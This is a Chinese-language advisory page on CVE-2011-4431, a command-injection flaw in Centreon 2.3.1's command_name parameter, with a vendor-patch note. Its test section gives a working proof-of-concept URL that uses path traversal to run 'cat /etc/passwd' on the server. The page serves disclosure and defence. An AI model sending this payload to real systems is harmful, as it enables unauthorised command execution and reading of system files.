Centreon “command_name”参数远程命令执行漏洞

发布日期：2011-11-04
更新日期：2011-11-21受影响系统：
Centreon Centreon 2.3.1
不受影响系统：
Centreon Centreon 2.3.2
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 50568
CVE ID: CVE-2011-4431Centreon是一款开源的软件，主要用于与nagios搭配，通过页面管理nagios，通过第三方组件实现对网络，操作系统，应用程序的监控。Centreon的"command_name"参数在实现上存在输入验证漏洞，攻击者可利用此漏洞在命令执行任意命令。所有可以访问"Configuration > Nagios > Checks"的帐户都可以执行命令。<*来源：Christophe De La Fuente

链接：https://www.trustwave.com/spiderlabs/advisories/TWSL2011-017.txt
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！"cat /etc/passwd":http://example.domain/centreon/main.php？p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1建议：
--------------------------------------------------------------------------------
厂商补丁：Centreon
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.centreon.com/Pale Moon多个安全漏洞Ruby on Rails Translate Helper方法跨站脚本执行漏洞相关资讯漏洞 Centreon

Centreon "file_put_contents（）"函（11/28/2014 18:00:45）
快递官网漏洞泄露 1400 万用户信息（08/12/2014 08:37:42）
软件漏洞是一笔大买卖！（10/06/2012 08:28:32）

Centreon本地信息泄露漏洞（11/28/2014 17:56:54）
Centreon "menu"参数SQL盲注漏洞（12/15/2012 09:05:41）
要389目录服务器访问绕过漏洞（10/01/2012 09:18:08）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容